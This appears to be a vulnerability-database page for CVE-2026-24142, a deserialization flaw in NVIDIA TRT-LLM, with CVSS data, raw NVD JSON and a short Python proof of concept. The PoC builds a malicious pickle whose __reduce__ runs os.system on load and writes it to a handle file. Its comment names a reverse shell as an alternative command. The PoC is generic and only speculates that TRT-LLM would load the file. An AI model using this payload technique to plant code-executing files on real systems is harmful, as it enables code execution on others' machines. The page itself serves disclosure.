Security Vulnerability Report
中文
CVE-2026-24142 CVSS 6.3 MEDIUM

CVE-2026-24142

Published: 2026-05-20 04:16:45
Last Modified: 2026-05-20 13:57:16

Description

NVIDIA TRT-LLM for any platform contains a deserialization vulnerability and unsafe serialized handle. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

NVIDIA TRT-LLM(具体受影响版本请参考NVIDIA官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import pickle import os # Define a malicious class that executes code upon deserialization class MaliciousPayload: def __reduce__(self): # Command to execute (e.g., creating a file or reverse shell) return (os.system, ('touch /tmp/poc_success',)) # Serialize the malicious object malicious_data = pickle.dumps(MaliciousPayload()) # Simulate writing to an unsafe handle/file that TRT-LLM might load with open('malicious_model.handle', 'wb') as f: f.write(malicious_data) print("Malicious handle generated. If TRT-LLM loads this, code will execute.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24142", "sourceIdentifier": "[email protected]", "published": "2026-05-20T04:16:44.993", "lastModified": "2026-05-20T13:57:15.740", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA TRT-LLM for any platform contains a deserialization vulnerability and unsafe serialized handle. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.0, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24142", "source": "[email protected]"}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5805", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24142", "source": "[email protected]"}]}}